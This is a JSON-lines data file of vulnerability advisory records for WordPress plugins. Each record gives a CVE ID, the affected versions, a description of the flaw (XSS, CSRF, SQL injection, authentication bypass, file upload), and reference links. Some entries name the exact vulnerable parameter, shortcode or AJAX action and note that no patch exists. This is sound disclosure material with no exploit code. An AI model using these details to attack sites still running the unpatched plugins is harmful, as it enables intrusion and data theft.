{"CVE_ID":"CVE-2024-6864","slug":"wp-last-modified-info","versionImpact":"1.9.0","description":"The WP Last Modified Info plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018template\u2019 attribute of the lmt-post-modified-info shortcode in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87368d85-04d4-42e6-9ba6-2a1fc3b945a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87368d85-04d4-42e6-9ba6-2a1fc3b945a8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-last-modified-info\\\/trunk\\\/inc\\\/Core\\\/Frontend\\\/PostView.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-last-modified-info\\\/trunk\\\/inc\\\/Core\\\/Frontend\\\/PostView.php#L205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-last-modified-info\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-last-modified-info\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137253\\\/#file23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137253\\\/#file23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137253\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137253\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8093","slug":"posts-reminder","versionImpact":"0.20","description":"The Posts reminder WordPress plugin through 0.20 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7fd690a-5f02-491c-a3fb-6eac9ffffe96\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7fd690a-5f02-491c-a3fb-6eac9ffffe96\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9821","slug":"bot-for-telegram-on-woocommerce","versionImpact":"1.2.4","description":"The Bot for Telegram on WooCommerce plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'stm_wpcfto_get_settings' AJAX action in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the Telegram Bot Token, a secret token used to control the bot, which can then be used to log in as any existing user on the site, such as an administrator, if they know the username, due to the Login with Telegram feature.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a662c904-ba2e-494c-a603-b22eeeddf43d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a662c904-ba2e-494c-a603-b22eeeddf43d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bot-for-telegram-on-woocommerce\\\/trunk\\\/nuxy\\\/helpers\\\/helpers.php?rev=2575772#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bot-for-telegram-on-woocommerce\\\/trunk\\\/nuxy\\\/helpers\\\/helpers.php?rev=2575772#L54\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12005","slug":"wp-bibtex","versionImpact":"3.0.1","description":"The WP-BibTeX plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.1. This is due to missing or incorrect nonce validation on the wp_bibtex_option_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bibtex\\\/trunk\\\/wp-bibtex-options.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bibtex\\\/trunk\\\/wp-bibtex-options.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225023\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-bibtex\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-bibtex\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/077538e2-ef9a-490f-9188-31f9cb82aaf7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/077538e2-ef9a-490f-9188-31f9cb82aaf7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0368","slug":"banner-garden","versionImpact":"0.1.3","description":"The Banner Garden Plugin for WordPress plugin through 0.1.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a4f7097-082b-4375-9582-945928d765b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a4f7097-082b-4375-9582-945928d765b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13235","slug":"booking-system","versionImpact":"2.9.9.5.4","description":"The Pinpoint Booking System \u2013 #1 WordPress Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the 'language' parameter in all versions up to, and including, 2.9.9.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/translation\\\/class-backend-translation.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/translation\\\/class-backend-translation.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59cba7f0-cb06-4408-abba-49552dddd04c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59cba7f0-cb06-4408-abba-49552dddd04c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11917","slug":"wp-jobsearch","versionImpact":"2.9.2","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.8.8. This is due to improper configurations in the 'jobsearch_xing_response_data_callback', 'set_access_tokes', and 'google_callback' functions. This makes it possible for unauthenticated attackers to log in as the first connected Xing user, or any connected Xing user if the Xing id is known. It is also possible for unauthenticated attackers to log in as the first connected Google user if the user has logged in, without subsequently logging out, in thirty days. The vulnerability was partially patched in version 2.8.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6de8a608-8715-4f9c-9f2f-df60dd1cc579?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6de8a608-8715-4f9c-9f2f-df60dd1cc579?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4924","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.1.3.3. This is due to missing capability checks on the woobe_bulkoperations_delete function. This makes it possible for authenticated attackers, with subscriber access or higher, to delete products.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L344\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L344\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dfd0246-4265-4dde-8a1e-18b7042eae74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dfd0246-4265-4dde-8a1e-18b7042eae74?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1449","slug":"master-slider","versionImpact":"3.9.5","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ms_slide shortcode in all versions up to, and including, 3.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af9adb6b-f726-4b74-be5c-82fdab0ae1f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af9adb6b-f726-4b74-be5c-82fdab0ae1f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8092","slug":"accordion-image-menu","versionImpact":"3.1.3","description":"The Accordion Image Menu WordPress plugin through 3.1.3 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5a91ceb-8a92-4f99-b7b7-1c4e0a587022\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5a91ceb-8a92-4f99-b7b7-1c4e0a587022\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9592","slug":"paypal-gift-certificate","versionImpact":"1.2.3","description":"The Easy PayPal Gift Certificate plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the 'wpppgc_plugin_options' function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72880e44-b0e0-47f4-82f0-c36c81091ba8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72880e44-b0e0-47f4-82f0-c36c81091ba8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-gift-certificate\\\/tags\\\/1.2.3\\\/paypal-gift-certificate.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-gift-certificate\\\/tags\\\/1.2.3\\\/paypal-gift-certificate.php#L200\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9886","slug":"wp-baidu-map","versionImpact":"1.2.2","description":"The WP Baidu Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'baidu_map' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd917ae-3fa2-47b5-ace7-1462647e2352?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd917ae-3fa2-47b5-ace7-1462647e2352?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-baidu-map\\\/trunk\\\/wp-baidu-map.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-baidu-map\\\/trunk\\\/wp-baidu-map.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-baidu-map\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-baidu-map\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13332","slug":"transfinanz","versionImpact":"1.0.0","description":"The TransFinanz WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35b53a2d-9a8b-49e7-9553-ea09c9c50d66\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35b53a2d-9a8b-49e7-9553-ea09c9c50d66\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6572","slug":"stepbyteservice-openstreetmap","versionImpact":"1.2.0","description":"The OpenStreetMap for Gutenberg and WPBakery Page Builder (formerly Visual Composer) WordPress plugin through 1.2.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c7a8ac-1acd-45b7-abe5-5635fbb5d4c1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c7a8ac-1acd-45b7-abe5-5635fbb5d4c1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c7a8ac-1acd-45b7-abe5-5635fbb5d4c1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c7a8ac-1acd-45b7-abe5-5635fbb5d4c1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4923","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulkoperations_delete function. This makes it possible for unauthenticated attackers to delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L344\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L344\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a4db03d-ec40-4145-aa95-fee78bda5205?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a4db03d-ec40-4145-aa95-fee78bda5205?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0611","slug":"master-slider","versionImpact":"3.9.5","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slides callback functionality in all versions up to, and including, 3.9.5. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0611\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0611\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3594","slug":"idonate","versionImpact":"1.9.0","description":"The IDonate  WordPress plugin through 1.9.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a8a834a-e5d7-4678-9d35-4390d1200437\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a8a834a-e5d7-4678-9d35-4390d1200437\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7384","slug":"acymailing","versionImpact":"9.7.2","description":"The AcyMailing \u2013 An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the acym_extractArchive function in all versions up to, and including, 9.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c747bc9-582c-4b9f-85a4-469c446d50f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c747bc9-582c-4b9f-85a4-469c446d50f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acymailing\\\/trunk\\\/back\\\/libraries\\\/wordpress\\\/file.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acymailing\\\/trunk\\\/back\\\/libraries\\\/wordpress\\\/file.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/acymailing\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/acymailing\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acymailing.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.acymailing.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Facymailing&old=3118953&new_path=%2Facymailing&new=3137644&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Facymailing&old=3118953&new_path=%2Facymailing&new=3137644&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137644\\\/\",\"name\":\"https:\\\/\\\/plugins.t
rac.wordpress.org\\\/changeset\\\/3137644\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8091","slug":"extended-search-plugin","versionImpact":"0.6.1","description":"The Enhanced Search Box WordPress plugin through 0.6.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ca90b81-7539-4a15-8c5a-39a8d96a74a2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ca90b81-7539-4a15-8c5a-39a8d96a74a2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9885","slug":"widget-or-sidebar-per-shortcode","versionImpact":"0.6.1","description":"The Widget or Sidebar Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sidebar' shortcode in all versions up to, and including, 0.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20584675-0d4a-4215-8132-e9ea95bee09b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20584675-0d4a-4215-8132-e9ea95bee09b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-or-sidebar-per-shortcode\\\/trunk\\\/class-widget-or-sidebar-per-shortcode.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-or-sidebar-per-shortcode\\\/trunk\\\/class-widget-or-sidebar-per-shortcode.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/widget-or-sidebar-per-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/widget-or-sidebar-per-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10390","slug":"elfsight-telegram-chat-cc","versionImpact":"1.1.0","description":"The Elfsight Telegram Chat CC plugin for WordPress is vulnerable to unauthorized modification of data to a missing capability check on the 'updatePreferences' function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07244763-3482-4cfb-8ae4-d19f312011aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07244763-3482-4cfb-8ae4-d19f312011aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/elfsight-telegram-chat\\\/25288599\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/elfsight-telegram-chat\\\/25288599\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13331","slug":"wp-dream-carousel","versionImpact":"1.0.1b","description":"The WP Dream Carousel WordPress plugin through 1.0.1b does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6425ccff-2e18-4498-b8b1-d493286efc7b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6425ccff-2e18-4498-b8b1-d493286efc7b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3870","slug":"1-decembrie-1918","versionImpact":"1","description":"The 1 Decembrie 1918 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.dec.2012. This is due to missing or incorrect nonce validation on the 1-decembrie-1918\/1-decembrie-1918.php page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-decembrie-1918\\\/tags\\\/1.dec.1918\\\/1-decembrie-1918.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-decembrie-1918\\\/tags\\\/1.dec.1918\\\/1-decembrie-1918.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/1-decembrie-1918\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/1-decembrie-1918\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73f7646f-f01f-4f57-836c-e0bd04764ba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73f7646f-f01f-4f57-836c-e0bd04764ba9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49419","slug":"esign-genie-for-wp","versionImpact":"2.0.3","description":"Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in esigngenie Foxit eSign for WordPress allows Retrieve Embedded Sensitive Data. This issue affects Foxit eSign for WordPress: from n\/a through 2.0.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/esign-genie-for-wp\\\/vulnerability\\\/wordpress-foxit-esign-for-wordpress-2-0-3-other-vulnerability-type-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/esign-genie-for-wp\\\/vulnerability\\\/wordpress-foxit-esign-for-wordpress-2-0-3-other-vulnerability-type-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
